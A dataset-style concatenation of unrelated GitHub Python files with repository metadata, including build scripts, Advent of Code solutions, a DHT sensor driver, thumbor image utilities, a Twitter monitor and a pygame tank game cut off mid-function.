['cmd', '/c', 'vcbuild.bat', 'release', 'x86', 'small-icu'],
env=env
)
elif config.nodeTargetConfig == 'Debug':
print("==============BUILDING DEBUG LIBRARIES=================")
subprocess.check_call(
['cmd', '/c', 'vcbuild.bat', 'debug', 'debug-nghttp2', 'x86', 'small-icu'],
env=env
)
else:
print("======UNKNOWN=======")
else:
# Build as release
if config.nodeTargetConfig == 'Release':
print("==============BUILDING RELEASE LIBRARIES=================")
subprocess.check_call([ sys.executable, 'configure.py', '--ninja' ] + configureArgvs)
subprocess.check_call(['ninja', '-C', 'out/Release'])
elif config.nodeTargetConfig == 'Debug':
# Build as debug
print("==============BUILDING DEBUG LIBRARIES=================")
subprocess.check_call([ sys.executable, 'configure.py', '--ninja', '--debug' ] + configureArgvs)
subprocess.check_call(['ninja', '-C', 'out/Debug'])
else:
print("==========UNKNOWN=========")
|
MafiaHub/building-node
|
scripts/build.py
|
build.py
|
py
| 1,694 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26302348125
|
import frappe, requests
from frappe.model.document import Document
class DjangoProperty(Document):
def db_insert(self):
d = self.get_valid_dict(convert_dates_to_str=True)
res = requests.post(f'{self.get_url()}/propertycreate/',
data=dict(d))
return res.json()
def load_from_db(self):
print(self.doctype, self.name, 'demonstration\n\n\n')
if(self.name!=self.doctype):
res = requests.get(f'{self.get_url()}/propertydetail/{self.name}/')
if(res.status_code==200):
for key, value in res.json()[0].items():
setattr(self, key, value)
def db_update(self):
d = self.get_valid_dict(convert_dates_to_str=True)
# print(type(d), type(dict(d)), '\n\n\n')
res = requests.post(f'{self.get_url()}/propertycreate/',
data=dict(d))
return res.json()
def get_list(self, args):
# print(args, 'ARGS, \n\n\n')
url = f"{self.get_url()}/propertylist/"
res = requests.get(url)
if(res.status_code==200):
return res.json()
return json.dumps([])
def get_url(self):
return "http://192.168.1.156:8000/property"
|
mymi14s/estate_app
|
estate_app/estate_app/doctype/djangoproperty/djangoproperty.py
|
djangoproperty.py
|
py
| 1,046 |
python
|
en
|
code
| 16 |
github-code
|
6
|
30906490211
|
import requests, re
def scrape_images(link):
# define our user headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
}
gallery_append = 'media?id=media0&ref=photoCollage&channel=RES_BUY'
link_replace = '?channel=RES_BUY'
regex_pattern = r'((?:https:)(?:[/|.|\w|\s|-])*(?:IMG_\d{2}_\d{4})\.(?:jpg|gif|png|jpeg))'
gallery_link = link.replace(link_replace, gallery_append)
res = requests.get(gallery_link, headers=headers)
res.raise_for_status()
matches = re.findall(regex_pattern, res.text)
matches_clean = list(dict.fromkeys(matches))
return matches_clean
|
GregorMonsonFD/holmly_sourcing_legacy
|
scripts/python/pdfGen/rightmove_image_extract.py
|
rightmove_image_extract.py
|
py
| 717 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70829089789
|
import logging.config
DEFAULT_LEVEL = logging.WARNING
DEFAULT_FMT = '%(asctime)s | %(levelname)-8s | %(message)s'
def install(level=DEFAULT_LEVEL, fmt=DEFAULT_FMT):
logging.basicConfig(level=level, format=fmt)
try:
import sys
import colorlog
formatter = colorlog.ColoredFormatter(
fmt='%(log_color)s' + fmt + '%(reset)s',
log_colors={
'DEBUG': 'blue',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'white,bg_red',
}
)
handler = colorlog.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
logging.root.handlers.clear()
logging.root.addHandler(handler)
except:
pass
|
Arcensoth/pymcutil
|
pymcutil/logging/__init__.py
|
__init__.py
|
py
| 799 |
python
|
en
|
code
| 3 |
github-code
|
6
|
27392276941
|
connections = {}
with open("Day12.txt", 'r') as INPUT:
data = INPUT.read().split("\n")
for i in data:
caves = i.split("-")
if caves[1] != "start":
if caves[0] in connections:
connections[caves[0]].append(caves[1])
else:
connections[caves[0]] = [caves[1]]
if caves[0] != "start":
if caves[1] in connections:
connections[caves[1]].append(caves[0])
else:
connections[caves[1]] = [caves[0]]
def get_paths():
paths = []
check = [["start"]]
while True:
new_check = []
if len(check) == 0:
break
for i in check:
if i[-1] not in connections:
continue
if i[-1] == "end":
paths.append(i)
continue
n = set(connections[i[-1]]) - set(j for j in i if j.islower())
for j in n:
new_check.append(i + [j])
check = new_check
return paths
print("part 1:", len(get_paths()))
def get_paths2():
paths = []
check = [["start"]]
while len(check):
new_check = []
for i in check:
if i[-1] not in connections:
continue
if i[-1] == "end":
paths.append(i)
continue
a = [s for s in i if s.islower()]
dupe = len(a) > len(set(a))
for j in connections[i[-1]]:
if j.islower() and j in i:
if not dupe:
new_check.append(i + [j])
else:
new_check.append(i + [j])
check = new_check
return paths
print("part 2:", len(get_paths2()))
|
stepheneldridge/Advent-of-Code-2021
|
Day12.py
|
Day12.py
|
py
| 1,813 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70143221629
|
# First sight solution
# PART ONE
class Solution:
def findRequirementsForMass(self, the_mass):
module_mass = int(the_mass)
dividedByThree = module_mass / 3
rounded_minus_two = int(dividedByThree) - 2
return rounded_minus_two
def findSolution(self, inputfile):
total_fuel_requirements = 0
for line in open(inputfile):
total_fuel_requirements = total_fuel_requirements + Solution().findRequirementsForMass(line.strip())
return int(total_fuel_requirements)
print("Day One Part One Solution: %d" % (Solution().findSolution('input.txt')))
# PART TWO
# My initial thoughts on this were that it sounded recursive, so thought this was the first
# approach. Took me longer to try it that way than I thought so I went with something more basic.
class SolutionPartTwo:
def findRequirementsForMass(self, the_mass):
module_mass = int(the_mass)
dividedByThree = module_mass / 3
rounded_minus_two = int(dividedByThree) - 2
return rounded_minus_two
def findSolution(self, inputfile):
total_fuel_requirements = 0
remaining = 0
for line in open(inputfile):
remaining = Solution().findRequirementsForMass(line.strip())
while remaining > 0: # This bit kinda stands in for recursive calls to a function
total_fuel_requirements = total_fuel_requirements + remaining
remaining = Solution().findRequirementsForMass(remaining)
return int(total_fuel_requirements)
print("Day One Part Two Solution: %d" % (SolutionPartTwo().findSolution('input.txt')))
|
StephenClarkApps/AdventOfCode2019
|
DayOne/DayOne.py
|
DayOne.py
|
py
| 1,637 |
python
|
en
|
code
| 0 |
github-code
|
6
|
2231582526
|
def state_machine(demanded_state):
switcher = {
0: menu,
1: cycling,
2: settings,
3: exit
}
func = switcher.get(demanded_state, "Not found!")
return func()
def allowed_transition(demanded_state, allowed_states = []):
for i in allowed_states:
if(demanded_state == allowed_states[i]):
return 1
return 0
#std_ret == 0
def menu():
print("\n>>> MAIN MENU <<<")
print("1. cycling")
print("2. settings")
print("3. exit")
std_ret = 0
try:
std_ret = int(input("Transition: "))
except:
std_ret = 0
return std_ret
#std_ret == 1
def cycling():
print("\n>>> CYCLING <<<")
print(" __ ")
print(" __\ \ ")
print(" (___)) ) ")
print(" /_/ ")
try:
std_ret = int(input("Transition: "))
except:
std_ret = 0
return std_ret
#std_ret == 10
def cycling_start():
print("\n>>> CYCLING <<<")
print(" Speed: ")
print("Distance: ")
print("Altitude: ")
print(" Time: ")
try:
std_ret = int(input("Transition: "))
if(allowed_transition(std_ret, arr = (1, 10, 11) != 1)):
std_ret = 1
except:
std_ret = 10
return std_ret
#std_ret == 11
def cycling_pause():
print("\n>>> CYCLING <<<")
print(" __ __ ")
print(" | | | | ")
print(" | | | | ")
print(" |__| |__| ")
try:
std_ret = int(input("Transition: "))
except:
std_ret = 0
return std_ret
#std_ret == 2
def settings():
print("\n>>> SETTINGS <<<")
try:
std_ret = int(input("Transition: "))
except:
std_ret = 0
return std_ret
#std_ret == 3
def exit():
print("\n>>> EXIT <<<")
print("------- pi-gps 2019 -------")
sys.exit()
def init():
try:
#serial setup
ser = serial.Serial(port="/dev/ttyS0", baudrate=9600, timeout=0.5)
#create file
filename = str(datetime.datetime.now().isoformat()) + '.gpx'
#xml data
xml_version = "1.0"
encoding = "UTF-8"
standalone="yes"
#gpx data
gpx_version="1.1"
creator="pi-gps 2019"
xsi_schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd"
xmlns="http://www.topografix.com/GPX/1/1"
xmlns_gpxtpx="http://www.garmin.com/xmlschemas/TrackPointExtension/v1"
xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance"
#metadata
name="pi-gps"
activity = "Cycling"
#return
std_ret = 1
except:
std_ret = 0
return std_ret
#start from main menu
number_of_active_state = 0
print("------- pi-gps 2019 -------")
while True:
std_ret = state_machine(std_ret)
|
frigodaw/pi-gps
|
python/stubs.py
|
stubs.py
|
py
| 3,026 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73185311228
|
nums = [0,0,1,1,1,2,2,3,3,4]
count = 1
for i in range(1, len(nums)):
if (nums[i] != nums[i - 1]):
nums[count] = nums[i]
count = count + 1
print(count)
for i in range(count, len(nums)):
nums.remove(nums[count ])
print(nums)
|
xuchenxing/MyLeetcode
|
junior/DeleteRepeatFromSortedList.py
|
DeleteRepeatFromSortedList.py
|
py
| 249 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26417087384
|
# Nesting - Store a set of dictionaries in a list or a list of
# items as a value in a dictionary. A power feature !
# An empty list for storing aliens
# At range() returns a set of numbers that teills Python how many
# times we want the lop to repeat. Each time the loop runs we
# create a new alien
# Append each new alien to the list aliens
aliens = []
# 30 green aliens
for alien_no in range(30):
new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}
aliens.append(new_alien)
# Show first 5 aliens
for alien in aliens[:5]:
print(alien)
print("...")
# Show how many aliens created
print("Total no of aliens: " + str(len(aliens)))
# code 2
# use for loop and if statement to change color, etc
# Modify first 3 aliens only
# If statement to ensure that we're onlly modifying green aliens
aliens = []
for alien_no in range(0,30):
new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}
aliens.append(new_alien)
for alien in aliens [0:3]:
if alien['color'] == 'green':
alien['color'] = 'yellow'
alien['speed'] = 'medium'
alien['points'] = 10
# show first five aliens
for alien in aliens[0:5]:
print(alien)
print("...")
# List in Dict
# Begin with a dict that holds info about pizza ordered
# One key in the dict is 'crust' and the associated value is
# 'thick'
# Next key 'toppings' with its values
# Summarize order
# To print the toppings, we write a for loop
# To access the list of toppings , use the key 'toppings'
# Python grabs the list of toppongs from the dict
# Info about ordered pizza
pizza = {
'crust': 'thick',
'toppings': ['mushrooms', 'cheese'],
}
# Summarize
print("Ordered a " + pizza['crust'] + "- crust pizza " +
" with the following toppings:")
for topping in pizza['toppings']:
print("\t" + topping)
# Code 2
# Value associated with each name is now a list
# Use the variable langs to hold each value from the dict
# as each value is a list
# Inside the main dict loop, we use another for loop to run
# thru each person's list of fav_lang
fav_lang ={
'je':['python', 'r'],
'sa':['c'],
'ed':['r','go'],
'ph':['python', 'ruby'],
}
for name, langs in fav_lang.items():
print("\n" + name.title() + "'s fav lang are:")
for lang in langs:
print("\t " + lang.title())
# Dict in Dict
# Define a dict called users with two keys: one each for the
# user names. Value associated with each key is a dict.
# Loop thru the users dict. Python stores each key in the
# variable username and the dict associated with each username
# goes into the variable user_info.
# Print the username
# Accessing the inner dict. The variable user_info has 3 keys
# ('first;, 'second', 'location')
# Use each key to generate full name and location for each person
users = {
' aeinstein': {
'first': 'albert',
'last': 'einstein',
'location':'princeton',
},
'mcurie':{
'first': 'marie',
'last': 'curie',
'location': 'paris',
},
}
for username, user_info in users.items():
print("\nUsername: " + username)
full_name = user_info['first'] + " " + user_info['last']
location = user_info['location']
print("\tFull name: " + full_name.title())
print("\tLocation: " + location.title())
|
wenlarry/CrashPython
|
dict_nesting.py
|
dict_nesting.py
|
py
| 3,383 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19181221365
|
"""Add agreed to TOS int field
Revision ID: 51398a87b2ef
Revises: 95c58503e9c0
Create Date: 2020-12-02 09:43:04.949189
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "51398a87b2ef"
down_revision = "95c58503e9c0"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column("users", sa.Column("accepted_tos", sa.Integer(), nullable=False, server_default="0"))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column("users", "accepted_tos")
# ### end Alembic commands ###
|
Almenon/couchers
|
app/backend/src/couchers/migrations/versions/51398a87b2ef_add_agreed_to_tos_int_field.py
|
51398a87b2ef_add_agreed_to_tos_int_field.py
|
py
| 696 |
python
|
en
|
code
| null |
github-code
|
6
|
10120432429
|
"""
Library and Wrapper for DHT11 and DHT22 sensors.
Based on https://github.com/JurassicPork/DHT_PyCom/tree/pulses_get
Extensions: Renamed module filename to dht (from dth.py) and added wrapper function
For hardware connection: YELLOW/WHITE: PIN1 VCC through GPIO, PIN2: DATA through GPIO, PIN3: NC, PIN4: GDN. Use also a 4.7k PULL-UP for DATA
"""
import utime
import pycom
import sensors
from machine import Pin
import logging
class DTHResult:
'DHT sensor result returned by DHT.read() method'
ERR_NO_ERROR = 0
ERR_MISSING_DATA = 1
ERR_CRC = 2
error_code = ERR_NO_ERROR
temperature = -1
humidity = -1
def __init__(self, error_code, temperature, humidity):
self.error_code = error_code
self.temperature = temperature
self.humidity = humidity
def is_valid(self):
return self.error_code == DTHResult.ERR_NO_ERROR
class DTH:
'DHT sensor (dht11, dht21,dht22) reader class for Pycom'
#__pin = Pin('P3', mode=Pin.OPEN_DRAIN)
__dhttype = 0
def __init__(self, pin, sensor=0):
self.__pin = Pin(pin, mode=Pin.OPEN_DRAIN)
self.__dhttype = sensor
self.__pin(1)
utime.sleep(1.0)
def read(self):
# pull down to low
self.__send_and_sleep(0, 0.019)
data = pycom.pulses_get(self.__pin,100)
self.__pin.init(Pin.OPEN_DRAIN)
self.__pin(1)
#print(data)
bits = []
for a,b in data:
if a ==1 and 18 <= b <= 28:
bits.append(0)
if a ==1 and 65 <= b <= 75:
bits.append(1)
#print("longueur bits : %d " % len(bits))
if len(bits) != 40:
return DTHResult(DTHResult.ERR_MISSING_DATA, 0, 0)
#print(bits)
# we have the bits, calculate bytes
the_bytes = self.__bits_to_bytes(bits)
# calculate checksum and check
checksum = self.__calculate_checksum(the_bytes)
if the_bytes[4] != checksum:
return DTHResult(DTHResult.ERR_CRC, 0, 0)
# ok, we have valid data, return it
[int_rh, dec_rh, int_t, dec_t, csum] = the_bytes
if self.__dhttype==0: #dht11
rh = int_rh #dht11 20% ~ 90%
t = int_t #dht11 0..50°C
else: #dht21,dht22
rh = ((int_rh * 256) + dec_rh)/10
t = (((int_t & 0x7F) * 256) + dec_t)/10
if (int_t & 0x80) > 0:
t *= -1
return DTHResult(DTHResult.ERR_NO_ERROR, t, rh)
def __send_and_sleep(self, output, mysleep):
self.__pin(output)
utime.sleep(mysleep)
def __bits_to_bytes(self, bits):
the_bytes = []
byte = 0
for i in range(0, len(bits)):
byte = byte << 1
if (bits[i]):
byte = byte | 1
else:
byte = byte | 0
if ((i + 1) % 8 == 0):
the_bytes.append(byte)
byte = 0
#print(the_bytes)
return the_bytes
def __calculate_checksum(self, the_bytes):
return the_bytes[0] + the_bytes[1] + the_bytes[2] + the_bytes[3] & 255
def get_reading(data_pin, dht_model, vcc_pin=None):
""" Returns temperature & humidity reading, for given VCC and DATA pins """
sensors.set_sensor_power_on(vcc_pin)
# measurement
if dht_model == "DHT11":
th = DTH(data_pin, 0)
elif dht_model == "DHT22":
th = DTH(data_pin, 1)
else:
th = None
temp = None
hum = None
if th:
result = th.read()
if result.is_valid():
temp = result.temperature
hum = result.humidity
else:
logging.error("DHT model [" + dht_model + "]: invalid result.")
sensors.set_sensor_power_off(vcc_pin)
# return results
# print('Temperature: {:3.2f}'.format(result.temperature/1.0))
# print('Humidity: {:3.2f}'.format(result.humidity/1.0))
return (temp, hum)
|
insighio/insighioNode
|
insighioNode/lib/sensors/dht.py
|
dht.py
|
py
| 3,993 |
python
|
en
|
code
| 5 |
github-code
|
6
|
42300472031
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 14 12:43:40 2019
@author: Minh
"""
import json
import requests
import tweepy
import base64
import sys
import time
import os
import csv
from AlarmDialogUtil import showAlertDialog
class TwitterMonitor():
twitter_public = twitter_private = access_token = access_token_secret = ''
def __init__(self):
#fill out with keys
self.twitter_public = 'CONSUMER_KEY'
self.twitter_private = 'CONSUMER_SECRET'
self.access_token = 'ACCESS_TOKEN'
self.access_token_secret = 'ACCESS_SECRET'
def monitor(self):
twitter_ids = list(123432, 32423432, 23432423) #random examples
auth = tweepy.OAuthHandler(self.twitter_public, self.twitter_private)
auth.set_access_token(self.access_token, self.access_token_secret)
api = tweepy.API(auth)
streamListener = self.AlertStreamListener()
stream = tweepy.Stream(auth = api.auth, listener=streamListener)
stream.filter(follow=twitter_ids)
class AlertStreamListener(tweepy.StreamListener):
def on_status(self, status):
if(not hasattr(status, 'retweeted_status') and status.in_reply_to_status_id_str == None
and status.in_reply_to_user_id_str == None):
title = status.user.name
text = "text: {} \n\n url:{}".format(status.text, status.entities['urls'])
showAlertDialog(title, text)
with open("twitter/TwitterMonitorLog", "a") as file:
file.write(json.dumps(status._json) + "\n\n")
def on_error(self, status_code):
if status_code == 420:
print("error on connecting to stream: 420 ; time: {}".format(time.time()))
#returning False in on_error disconnects the stream
return False
if __name__ == "__main__":
while True:
try:
TwitterMonitor().monitor()
except Exception as e:
showAlertDialog("Error", "Program exited:\n" + str(e))
time.sleep(60)
|
BeePete/SBV1
|
twitter_monitor.py
|
twitter_monitor.py
|
py
| 2,214 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37395020380
|
import subprocess
# Start gameLibrary.py in a subprocess
game_process = subprocess.Popen(["python", "gameLibrary.py"])
# Start highscoreChecker.py in a subprocess
highscore_checker_process = subprocess.Popen(["python", "highscoreChecker.py"])
# Start highscoreDisplay.py in a subprocess
highscore_process = subprocess.Popen(["python", "highscoreDisplay.py"])
# Wait for the game subprocess to finish
game_process.wait()
# Terminate the other subprocesses
highscore_checker_process.terminate()
highscore_process.terminate()
|
Tsukaiyo/cat6Dist
|
cat6/main.py
|
main.py
|
py
| 545 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43243448951
|
import logging
from functools import wraps
from io import BytesIO
from PIL import Image
try:
from PIL import ImageCms # pylint: disable=ungrouped-imports
except ImportError:
ImageCms = None
DEFAULT_SRGB_PROFILE = None
TRANSFORM_FLAGS = 0
else:
DEFAULT_SRGB_PROFILE = ImageCms.ImageCmsProfile(
ImageCms.createProfile("sRGB")
)
TRANSFORM_FLAGS = (
ImageCms.FLAGS["NOTCACHE"]
| ImageCms.FLAGS["NOTPRECALC"]
| ImageCms.FLAGS["BLACKPOINTCOMPENSATION"]
| ImageCms.FLAGS["HIGHRESPRECALC"]
)
CONTENT_TYPE = {
".jpg": "image/jpeg",
".jpeg": "image/jpeg",
".gif": "image/gif",
".png": "image/png",
".webp": "image/webp",
".mp4": "video/mp4",
".webm": "video/webm",
".svg": "image/svg+xml",
".tif": "image/tiff",
".tiff": "image/tiff",
".avif": "image/avif",
".heic": "image/heif",
".heif": "image/heif",
}
EXTENSION = {
"image/jpeg": ".jpg",
"image/gif": ".gif",
"image/png": ".png",
"image/webp": ".webp",
"video/mp4": ".mp4",
"video/webm": ".webm",
"image/svg+xml": ".svg",
"image/tiff": ".tif",
"image/avif": ".avif",
"image/heif": ".heic",
}
logger = logging.getLogger("thumbor")
def deprecated(message):
def decorator_deprecated(func):
@wraps(func)
def wrapper_deprecated(*args, **kwargs):
logger.warning(
"Deprecated function %s%s",
func.__name__,
message,
)
return func(*args, **kwargs)
return wrapper_deprecated
return decorator_deprecated
def get_profile_and_color_space(icc):
with BytesIO(icc) as buf:
try:
profile = ImageCms.ImageCmsProfile(buf)
return profile, profile.profile.xcolor_space.strip()
except (AttributeError, OSError, TypeError, ValueError):
return None, None
def get_color_space(img):
icc = img.info.get("icc_profile")
if not icc:
return "RGB"
if ImageCms is None:
return None
_, color_space = get_profile_and_color_space(icc)
return color_space
def ensure_srgb(img, srgb_profile=None):
"""
Ensures that an image either has no ICC profile (and so is implicitly
sRGB) or has an sRGB color profile. If the image is sRGB, it is returned
unchanged. If it has a CMYK or Gray color profile, this function will
return an image converted to sRGB. Any color profiles in other color
spaces will return None.
"""
img_info = dict(img.info)
icc = img_info.pop("icc_profile", None)
if not icc:
return img
if ImageCms is None:
raise RuntimeError("ImageCms is required for color profile utilities")
if srgb_profile is not None:
srgb_profile = ImageCms.ImageCmsProfile(srgb_profile)
else:
srgb_profile = DEFAULT_SRGB_PROFILE
orig_profile, color_space = get_profile_and_color_space(icc)
if not color_space:
return None
if color_space == "RGB":
logger.debug("Returning img (RGB)")
return img
if color_space not in ("GRAY", "CMYK"):
# Other color spaces are rare, but best not to try to convert them.
# Upstream understands a None return as meaning it should not
# use it for the target encoder.
logger.debug("Cannot convert to sRGB; color space = %s", color_space)
return None
# Probably not possible to have an animated image with CMYK or GRAY icc
# profile, but best leave it alone if we have one
if getattr(img, "is_animated", False):
return None
if color_space == "GRAY":
pil_mode = "L"
else:
pil_mode = "CMYK"
logger.debug("Converting from %s to sRGB", color_space)
transform = ImageCms.ImageCmsTransform(
orig_profile,
srgb_profile,
pil_mode,
"RGBA",
intent=ImageCms.Intent.RELATIVE_COLORIMETRIC,
flags=TRANSFORM_FLAGS,
)
src_im = Image.new(pil_mode, img.size, "white")
src_im.paste(img)
dst_im = Image.new("RGBA", img.size, "white")
dst_im.info = img_info
dst_im = transform.apply(src_im, dst_im)
dst_im = dst_im.convert("RGB")
dst_im.info = img_info
return dst_im
|
thumbor/thumbor
|
thumbor/utils.py
|
utils.py
|
py
| 4,272 |
python
|
en
|
code
| 9,707 |
github-code
|
6
|
36043542856
|
pessoas = []
media = cont = 0
while True:
pessoas.append({"nome":input("Nome: ").title().strip()})
pessoas[cont]["sexo"] = input("Sexo [F/M]: ").upper().strip()
while pessoas[cont]["sexo"] not in "FM":
print("ERRO! Por favor, digite apenas M ou F.")
pessoas[cont]["sexo"] = input("Sexo [F/M]: ").upper().strip()
pessoas[cont]["idade"] = int(input("Idade: "))
media += pessoas[cont]["idade"]
cont += 1
es = input("Quer continuar?[S/N]: ").strip()
while es not in "snSN":
print("ERRO! Responda apenas S ou N.")
es = input("Quer continuar?[S/N]: ").strip()
if es == "n":
break
media /= len(pessoas)
print("=-" * 35)
print(f"A) Foram cadastradas {len(pessoas)} pessoas.")
print(f"B) A média de idade é de {media} anos..")
print("C) As mulheres cadstrads foram:", end=" ")
for c in pessoas:
if c["sexo"] == "F":
print(c["nome"], end=" ")
print()
print("D) Lista de pessoas com a idade acima da média:")
for c in pessoas:
if c["idade"] > media:
for k, v in c.items():
print(f"{k:>8} = {v:<14}",end="")
print()
print("<< ENCERRADO >>")
|
amandasales/Cadastro
|
cadastro.py
|
cadastro.py
|
py
| 1,185 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
2026784639
|
import msvcrt
import zipfile
import threading
from selenium import webdriver
from selenium.webdriver.edge.options import Options
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor,wait, FIRST_COMPLETED, ALL_COMPLETED
resultList = []
unfoundList = []
alltask = []
def main():
file = 'C:\\Users\\niu\Desktop\\上传\CartoonCustomSticker.aab'
dependenciesDict = {}
threadList = []
if zipfile.is_zipfile(file):
print()
z = zipfile.ZipFile(file, 'r')
namelist = z.namelist()
pool = ThreadPoolExecutor(len(namelist))
for zFile in namelist:
if zFile.endswith('.version'):
# print('"' + zFile.split('/').pop()[:-8] + '":"' + str(z.read(zFile), encoding='utf-8').strip() + '",')
# print(zFile.split('/').pop()[:-8])
pair = zFile.split('/').pop()[:-8].split('_')
# pool.submit(getLatestVersion,pair[0],pair[1])
# alltask.append(task)
t = threading.Thread(target=getLatestVersion,args=(pair[0],pair[1]))
t.start()
# threadList.append(t)
# getLatestVersion(pair[0],pair[1])
# dependenciesDict[pair[0]] = pair[1]
print('查询中...')
# t.start()
# t.join()
# wait(alltask,return_when=ALL_COMPLETED)
# for group, artifact in dependenciesDict.items():
# thread = threading.Thread(target=getLatestVersion, args=(group, artifact))
# getLatestVersion(group, artifact)
# threadList.append(thread)
# for thread in threadList:
# thread.start()
# for thread in threadList:
# thread.join()
print('结果如下:')
for item in resultList:
print(item)
print('\n未查询到的依赖如下:')
print(unfoundList)
msvcrt.getch()
def getLatestVersion(group_id, artifact_id):
global resultList
global unfoundList
url = f'https://mvnrepository.com/artifact/{group_id}/{artifact_id}'
# url = 'https://mvnrepository.com/artifact/androidx.appcompat/appcompat' # 这里是Spring Boot库的URL
options = Options()
options.use_chromium = True
options.add_argument("headless")
options.add_argument("disable-gpu")
options.add_argument(
"user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3")
driver = webdriver.Edge(options=options) # 这里使用Edge浏览器
driver.get(url)
html = driver.page_source
# print(f'groupId:{group_id}, artifact:{artifact_id}')
# print(html)
soup = BeautifulSoup(html, 'html.parser')
version_element = soup.find('a', {'class': 'vbtn release'})
if not version_element is None:
latest_version = version_element.text.strip()
print(f'"{group_id}:{artifact_id}":"{latest_version}",')
resultList.append(f'"{group_id}:{artifact_id}":"{latest_version}",')
else:
print(f'{group_id}_{artifact_id}')
unfoundList.append(f'{group_id}:{artifact_id}')
driver.quit()
main()
|
Nienter/mypy
|
personal/getNewestVersion.py
|
getNewestVersion.py
|
py
| 3,123 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23261593645
|
import pygame
import math
import random
#CONST
SCREENWIDTH=1280
SCREENHEIGHT=720
# pygame setup
pygame.init()
screen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))
clock = pygame.time.Clock()
running = True
dt = 0
FPS=60
pygame.display.set_caption('TANK')
#variables
x_target=[]
y_target=[]
checkVar =1
showHelp=False
#functions
#Start screen
isStartingScreen=True
def start_Screen():
screen.fill('white')
font = pygame.font.Font('fonts/TitleFont.ttf', 150)
sfont = pygame.font.Font('fonts/TitleFont.ttf', 50)
title = font.render('TANKS',True,'black','white')
titleRect = screen.get_rect(center=(SCREENWIDTH//2+SCREENWIDTH//3+30,SCREENHEIGHT//2+SCREENHEIGHT//3))
subtext= sfont.render("PRESS 'E' TO CONTINUE", True,'black','white')
subRect = screen.get_rect(center=(SCREENWIDTH//2+SCREENWIDTH//3,SCREENHEIGHT//2+SCREENHEIGHT//3+200))
screen.blit(title, titleRect)
screen.blit(subtext, subRect)
class Target:
def __init__(self,x,y):
self.x = int(x)
self.y = int(y)
#spawnTarget
def spawnTarget(self):
for i in range(10):
x= random.randint(SCREENWIDTH//2,SCREENWIDTH*0.9)
y = random.randint(50,SCREENHEIGHT*0.8)
x_target.append(x)
y_target.append(y)
#drawTarget
def drawTarget(self):
targetIMG = pygame.image.load('images/target.png').convert_alpha()
for i in range(0,10):
screen.blit(targetIMG,(x_target[i],y_target[i]))
#classes
class Player:
KEYS = pygame.key.get_pressed()
def __init__(self,x,y,alpha,g,V0,t,dt,isShoted,score,bx,by):
self.x = int(x)
self.y = int(y)
self.alpha =int(alpha)
self.g = g
self.V0 = V0
self.t = t
self.dt = dt
self.isShoted = isShoted
self.score = score
self.bx = bx
self.by = by
def draw(self):
#tank_body
tank= pygame.image.load('images/Tank.png').convert_alpha()
tank= pygame.transform.scale(tank, (65, 40))
screen.blit(tank, (self.x,self.y))
def move(self):
if(self.isShoted==False):
if(KEYS[pygame.K_a]):
self.x-=3
if(KEYS[pygame.K_d]):
self.x+=3
def tankTurret(self):
global turretPointX,turretPointY
if(self.isShoted==False):
if(KEYS[pygame.K_w]):
self.alpha+=1
if(KEYS[pygame.K_s]):
self.alpha-=1
if(self.alpha<=0):
self.alpha=0
if(self.alpha>=90):
self.alpha=90
theta = math.radians(self.alpha)
end_x = (self.x+35) + 40 * math.cos(theta)
end_y = (self.y+5) - 40 * math.sin(theta)
pygame.draw.line(screen, 'black', (self.x+35,self.y+5), (end_x,end_y),5)
pygame.draw.circle(screen, 'black', (end_x,end_y), 2)
pygame.draw.circle(screen, 'black', (self.x+35,self.y+5), 2)
turretPointX,turretPointY=end_x,end_y
def wallCollision(self):
if(self.x<=0): self.x=0
if(self.x>=231): self.x=231
def shoot(self):
#meth needed for this math XD
theta = math.radians(self.alpha)
V0x = self.V0 * math.cos(theta)
V0y = self.V0 * math.sin(theta)
self.bx= turretPointX+V0x *self.t
self.by=turretPointY- V0y*self.t+0.5*self.g+self.t**2
pygame.draw.circle(screen, 'black', (int(self.bx),int(self.by)), 5)
if(self.bx<0 or self.bx>1280 or self.by>720):
self.bx=(self.x+35)
self.by=(self.y+5)
V0x = self.V0 * math.cos(theta)
V0y = self.V0 * math.sin(theta)
self.isShoted=False
self.t=0
def checkColl(self):
for i in range(10):
if(self.bx>=x_target[i] and self.bx<=x_target[i]+50 and self.by>=y_target[i] and self.by<=y_target[i]+50 and self.bx<=x_target[i]+50 and self.by<=y_target[i]+50):
self.score+=1
x_target[i]=2000
y_target[i]=2000
class gameGUI:
def __init__(self,x,y):
self.x = int(x)
self.y = int(y)
def draw(self):
ground = pygame.image.load('images/ground.png').convert_alpha()
ground = pygame.transform.scale(ground, (300,300))
screen.blit(ground, (0,SCREENHEIGHT*0.62))
font = pygame.font.Font('fonts/TitleFont.ttf', 30)
Q = pygame.image.load('images/Q.png').convert_alpha()
Q = pygame.transform.scale(Q, (50,50))
screen.blit(Q, (SCREENWIDTH*0.75,SCREENHEIGHT*0.9+5))
Qtxt = font.render("PRESS FOR HELP ", True, 'black','white')
